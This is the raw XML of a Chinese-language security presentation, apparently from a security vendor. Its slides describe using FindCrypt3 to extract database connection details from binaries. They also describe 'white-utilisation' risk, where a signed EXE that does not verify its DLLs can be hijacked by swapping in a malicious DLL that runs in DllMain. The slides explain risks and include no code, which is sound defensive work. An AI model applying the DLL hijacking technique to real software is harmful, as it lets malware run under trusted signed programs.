            <p:txBody>
              <a:bodyPr wrap="non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修改</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>FindCrypt3</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>用于敏感信息匹配</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="文本框 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAA7349-C831-D108-0831-620ED3C02F41}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8541085" y="6081622"/>
                <a:ext cx="1620957" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="non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数据库成功连接</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="直线箭头连接符 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABE4103-29D1-8743-3206-9E818B579DD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3616155" y="3253474"/>
              <a:ext cx="236949" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="直线箭头连接符 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C708C2B8-D0FC-7AE9-26A9-38FA82514AD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3724876" y="5100039"/>
              <a:ext cx="0" cy="339818"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="直线箭头连接符 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59DAEB3C-D738-A3D8-9D83-BDAB7FD813BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9351562" y="5065887"/>
              <a:ext cx="0" cy="373970"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D8AE06-9905-E0C2-206A-49BD9CC3F215}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4977745" y="6291837"/>
              <a:ext cx="2236510" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="non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匹配出数据库连接信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2208281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96439" y="813922"/>
            <a:ext cx="4858870" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>常规风险：白利用问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5681330" y="1523174"/>
            <a:ext cx="1089088" cy="45719"/>
            <a:chOff x="3232298" y="1892595"/>
            <a:chExt cx="1089088" cy="53163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3232298" y="1892595"/>
              <a:ext cx="829339" cy="531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492047" y="1892595"/>
              <a:ext cx="829339" cy="53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3" name="文本框 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10763276" y="6120208"/>
            <a:ext cx="2629976" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Empower Security </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Enrich life</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>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6D8C296E-F983-9180-0D39-C56A0D8D3430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2058567" y="1986998"/>
            <a:ext cx="8074864" cy="3796909"/>
            <a:chOff x="1862512" y="2257264"/>
            <a:chExt cx="8074864" cy="3796909"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="图片 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE34AF0-5447-D1D6-DF37-B7A81B77FCCF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862512" y="2257264"/>
              <a:ext cx="4621116" cy="2343472"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="文本框 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C36E4E-67C2-6E8F-7F18-1DBF5B211584}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862512" y="4730734"/>
              <a:ext cx="4621116" cy="1323439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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带有签名的程序没有校验调用的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，存在</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>劫持问题（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DllMain</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> DLL_PROCESS_ATTACH</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>）。</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>替换原</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>为恶意</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，即可实现</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>劫持，白</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>EXE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>文件</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-C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黑</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>文件。</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22" name="图片 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F88DA42-0818-E58D-25BD-01824F6E3676}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6976571" y="2257264"/>
              <a:ext cx="2960805" cy="3792829"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4539898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1276</TotalTime>
  <Words>2741</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>273</Paragraphs>
  <Slides>39</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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>DengXian</vt:lpstr>
      <vt:lpstr>DengXian Light</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Microsoft YaHei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User</cp:lastModifiedBy>
  <cp:revision>117</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-09T01:49:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-18T08:37:49Z</dcterms:modified>
</cp:coreProperties>
</file>